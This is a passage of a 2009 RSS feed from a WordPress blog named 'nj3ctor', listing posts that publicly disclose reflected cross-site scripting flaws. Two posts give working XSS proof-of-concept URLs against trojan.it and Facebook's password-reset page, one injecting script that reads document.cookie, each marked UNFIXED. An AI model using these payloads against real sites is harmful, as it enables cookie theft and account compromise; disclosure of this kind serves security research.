		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
		<item>
		<title>CHECK B.O. The Computer Guardian XSSed!</title>
		<link>http://nj3ctor.wordpress.com/2009/07/05/check-b-o-the-computer-guardian-xssed/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/05/check-b-o-the-computer-guardian-xssed/#comments</comments>
		<pubDate>Sun, 05 Jul 2009 17:30:34 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[XSS (Attacks)]]></category>
		<category><![CDATA[nj3ctor]]></category>
		<category><![CDATA[trojan.it]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=7</guid>
		<description><![CDATA[Sito XSSed: trojan.it XSS: http://www.trojan.it/index2.asp?lng=%22%3E%3Cscript%3Ealert%28%22nj3ctor%22%29;%3C/script%3E Autore: nj3ctor Status: UNFIXED<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=7&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Sito XSSed:<br />
<a href="http://www.trojan.it">trojan.it</a></p>
<p>XSS:<br />
<a href="http://www.trojan.it/index2.asp?lng=%22%3E%3Cscript%3Ealert%28%22nj3ctor%22%29;%3C/script%3E">http://www.trojan.it/index2.asp?lng=%22%3E%3Cscript%3Ealert%28%22nj3ctor%22%29;%3C/script%3E</a></p>
<p>Autore:<br />
<em>nj3ctor</em></p>
<p>Status:<br />
<strong>UNFIXED</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=7&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/05/check-b-o-the-computer-guardian-xssed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
		<item>
		<title>Reset Password Facebook con XSS</title>
		<link>http://nj3ctor.wordpress.com/2009/07/05/reset-password-facebook-con-xss/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/05/reset-password-facebook-con-xss/#comments</comments>
		<pubDate>Sun, 05 Jul 2009 17:03:19 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[Social Network]]></category>
		<category><![CDATA[XSS (Attacks)]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[reset password]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=4</guid>
		<description><![CDATA[XSS per resettare password Facebook: http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Mirror di XSSed.com: http://www.xssed.com/mirror/55951/ Autore: DaiMon Status: UNFIXED<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=4&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>XSS per resettare password Facebook:<br />
<a href="http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</a></p>
<p>Mirror di XSSed.com:<br />
<a href="http://www.xssed.com/mirror/55951/">http://www.xssed.com/mirror/55951/</a></p>
<p>Autore:<br />
<em>DaiMon</em></p>
<p>Status:<br />
<strong>UNFIXED</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/4/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=4&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/05/reset-password-facebook-con-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
		<item>
		<title>Hello world!</title>
		<link>http://nj3ctor.wordpress.com/2009/07/04/hello-world/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/04/hello-world/#comments</comments>
		<pubDate>Sat, 04 Jul 2009 15:57:45 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=1&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Welcome to <a href="http://wordpress.com/">WordPress.com</a>. This is your first post. Edit or delete it and start blogging!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=1&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/04/hello-world/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
	</channel>
</rss>
